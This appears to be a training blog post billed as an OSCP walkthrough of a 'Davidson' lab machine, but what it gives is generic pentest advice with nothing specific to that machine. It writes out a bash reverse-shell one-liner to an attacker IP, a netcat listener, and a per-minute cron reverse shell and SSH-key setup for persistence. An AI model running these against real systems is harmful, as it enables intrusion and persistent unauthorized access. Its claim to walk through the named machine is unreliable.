OSCP SX Pets CC: Davidson Guide & Walkthrough

Hey guys! Today, we're diving deep into the world of penetration testing with a focus on a specific challenge: the OSCP SX Pets CC, specifically the Davidson machine. If you're pursuing your OSCP (Offensive Security Certified Professional) certification or just looking to sharpen your skills, this walkthrough is for you. We'll break down each step, making it easy to understand and replicate. Let's get started!

Reconnaissance: Gathering Information

Reconnaissance is the critical first step in any penetration test. Think of it as your detective work – the more information you gather, the better prepared you'll be for the exploitation phase. For the Davidson machine, we'll start with the basics: identifying the target's IP address and then scanning for open ports and services.

Nmap Scan

We'll use Nmap, the network mapper, to scan the target machine. Nmap is a versatile tool that allows us to discover hosts and services on a computer network. A basic SYN scan helps us to identify open ports quickly.

nmap -sS -p- <target_ip>

This command performs a SYN scan (-sS) on all ports (-p-) of the target IP address. The results will show us which ports are open, giving us our initial attack vectors.

Once we've identified the open ports, we need to dig deeper to understand what services are running on those ports. We can use Nmap again, this time with service and version detection.

nmap -sV -p <open_ports> <target_ip>

Replace <open_ports> with the actual open ports discovered in the previous step. The -sV flag enables version detection, which attempts to determine the application name and version number of the service listening on the port. This information is invaluable because it helps us identify known vulnerabilities.

Examining the Results

After running the Nmap scans, analyze the output carefully. Look for common services like HTTP (port 80), HTTPS (port 443), SSH (port 22), FTP (port 21), and SMB (ports 139, 445). Note the version numbers of these services. Older versions are more likely to have known vulnerabilities.

For example, if you find an older version of Apache HTTP Server, you can search for known exploits on Exploit-DB or Metasploit. Similarly, outdated versions of SMB can be vulnerable to attacks like EternalBlue.

Also, enumerate any web services you find. Use tools like curl, wget, or a web browser to inspect the web pages. Look for interesting files, directories, or comments in the HTML source code. These can sometimes reveal sensitive information or hidden functionalities.

Reconnaissance is an ongoing process. As you gain more information about the target, you may need to adjust your scanning and enumeration techniques. Keep detailed notes of your findings, as this will help you prioritize your attack vectors and develop an effective exploitation strategy.

Remember, a thorough reconnaissance phase is the foundation for a successful penetration test. Don't rush this step – the more you know about the target, the better your chances of gaining access.

Exploitation: Gaining Access

Once we've gathered enough information during the reconnaissance phase, it's time to move on to exploitation. This involves using the vulnerabilities we've identified to gain access to the target system. The specific techniques used will depend on the vulnerabilities found, but here are some common approaches:

Web Application Exploits

If the target machine is running a web application, there are several potential avenues for exploitation. Some common web application vulnerabilities include:

• SQL Injection: This occurs when user input is not properly sanitized before being used in a SQL query. An attacker can inject malicious SQL code to bypass authentication, extract sensitive data, or even execute arbitrary commands on the database server.
• Cross-Site Scripting (XSS): This vulnerability allows an attacker to inject malicious JavaScript code into a web page. When other users visit the page, the code is executed in their browsers, potentially allowing the attacker to steal cookies, redirect users to malicious websites, or deface the website.
• Remote File Inclusion (RFI) / Local File Inclusion (LFI): These vulnerabilities allow an attacker to include remote or local files into the web application. This can be used to execute arbitrary code on the server, read sensitive files, or bypass authentication.
• Command Injection: This occurs when the web application executes operating system commands based on user input. An attacker can inject malicious commands to gain control of the server.

To exploit these vulnerabilities, you'll need to use tools like Burp Suite, OWASP ZAP, or manual techniques. Burp Suite is a popular web proxy that allows you to intercept and modify HTTP requests and responses. This can be used to test for vulnerabilities like SQL injection and XSS.

Exploiting Other Services

Besides web applications, other services running on the target machine may also be vulnerable. For example:

• SSH: If you find an older version of SSH, you can try to exploit known vulnerabilities or attempt to brute-force the password. Tools like Hydra or Medusa can be used for brute-forcing.
• FTP: Anonymous FTP access may be enabled, allowing you to upload malicious files to the server. Alternatively, you can try to exploit vulnerabilities in the FTP server software.
• SMB: Outdated versions of SMB are often vulnerable to attacks like EternalBlue, which can give you remote code execution on the target machine. Metasploit is a powerful tool for exploiting SMB vulnerabilities.

Using Metasploit

Metasploit is a powerful framework for developing and executing exploit code. It contains a large database of exploits for various vulnerabilities. To use Metasploit, you'll need to identify the target service and version number, then search for a corresponding exploit in Metasploit.

For example, if you find that the target machine is running an outdated version of Apache, you can search for Apache exploits in Metasploit using the search command.

msfconsole
search apache

Metasploit will display a list of available exploits. Choose the appropriate exploit based on the target service and version number. Then, set the required options, such as the target IP address and port number, and run the exploit.

Remember to always use the check command before running an exploit to verify that the target is vulnerable. Also, be aware that some exploits may be unreliable or may crash the target system.

Privilege Escalation: Becoming Root

After gaining initial access to the target machine, you'll likely be a low-privileged user. The next step is to escalate your privileges to gain root access. This will give you full control over the system.

Kernel Exploits

One common method of privilege escalation is to exploit vulnerabilities in the kernel. You can use tools like searchsploit to search for kernel exploits that are specific to the target operating system and version number.

searchsploit kernel <os_version>

This command will search Exploit-DB for kernel exploits that match the specified operating system version. If you find a suitable exploit, download it to the target machine and compile it. Then, run the exploit to gain root access.

SUID/SGID Binaries

Another common method of privilege escalation is to exploit SUID/SGID binaries. SUID (Set User ID) and SGID (Set Group ID) are special permissions that allow a program to be executed with the privileges of the owner or group, respectively.

You can use the find command to search for SUID/SGID binaries on the target machine.

find / -perm -4000 -o -perm -2000 -print 2>/dev/null

This command will list all SUID/SGID binaries on the system. Examine the list carefully and look for binaries that may be vulnerable. For example, if you find a SUID binary that executes system commands based on user input, you may be able to inject malicious commands to gain root access.

Misconfigured Services

Sometimes, services running on the target machine may be misconfigured in a way that allows you to escalate your privileges. For example, if a service is running as root but allows you to upload configuration files, you may be able to upload a malicious configuration file that executes arbitrary commands.

Weak File Permissions

Weak file permissions can also be exploited to gain root access. For example, if you find a file that is owned by root and is writable by other users, you may be able to modify the file to execute arbitrary commands when the file is executed by root.

Crontab Exploitation

Crontab entries can sometimes be exploited for privilege escalation. If you find a crontab entry that is running a script as root, and you have write access to that script, you can modify the script to execute arbitrary commands as root. First, check the crontab entries using crontab -l. If you don't have permissions, try checking the system-wide crontab files located in /etc/crontab or /etc/cron.d/. Look for any scripts that are being run as root and check if you have write access to those scripts. If you do, you can insert a reverse shell command into the script. For example:

bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1

Replace <attacker_ip> with your attacking machine's IP address and <attacker_port> with the port you're listening on. Start a netcat listener on your attacking machine:

nc -lvnp <attacker_port>

When the cron job runs, it will execute your modified script and you'll get a root shell on your attacking machine.

Privilege escalation requires careful observation and creativity. Always look for misconfigurations, weak permissions, and exploitable binaries. With enough persistence, you'll eventually find a way to gain root access.

Post-Exploitation: Maintaining Access

Once you've gained root access, it's important to maintain your access to the target machine. This will allow you to come back later and continue your work. There are several ways to maintain access, including:

Backdoors

One common method is to install a backdoor on the target machine. A backdoor is a program that allows you to bypass normal authentication and gain access to the system. There are many different types of backdoors, including:

• Reverse Shells: A reverse shell connects back to your attacking machine, giving you a command-line interface on the target machine.
• Bind Shells: A bind shell listens on a specific port on the target machine. You can connect to the port to gain a command-line interface.
• Web Shells: A web shell is a script that you upload to a web server. You can access the script through a web browser to execute commands on the server.

To install a backdoor, you'll need to upload the backdoor program to the target machine and configure it to run automatically. This can be done by adding a startup script to the /etc/init.d/ directory or by adding a cron job.

SSH Keys

Another method of maintaining access is to add your SSH public key to the authorized_keys file for the root user. This will allow you to log in to the target machine as root without needing a password.

To do this, generate an SSH key pair on your attacking machine.

ssh-keygen -t rsa

Then, copy the public key to the authorized_keys file on the target machine.

ssh-copy-id root@<target_ip>

Rootkits

A rootkit is a collection of tools that are used to hide malicious activity on a system. Rootkits can be used to hide backdoors, processes, and files from system administrators.

Installing a rootkit is a more advanced technique that requires a deep understanding of the target operating system. However, it can be very effective in maintaining access to a compromised system.

Scheduled Tasks

Schedule tasks (cron jobs) can also be leveraged to maintain persistent access. Create a cron job that runs a reverse shell at regular intervals. This ensures that even if the initial backdoor is discovered and removed, you can regain access when the cron job executes.

crontab -e

Add a line like this:

* * * * * bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1

Post-exploitation is just as important as gaining initial access. By implementing these techniques, you can ensure that you can always get back into the system, even if your initial entry point is closed off.

Conclusion

Alright, guys, that wraps up our walkthrough of the OSCP SX Pets CC Davidson machine. We covered everything from reconnaissance to post-exploitation, highlighting the key steps and techniques you'll need to succeed. Remember, practice makes perfect, so keep experimenting and honing your skills. Good luck on your OSCP journey!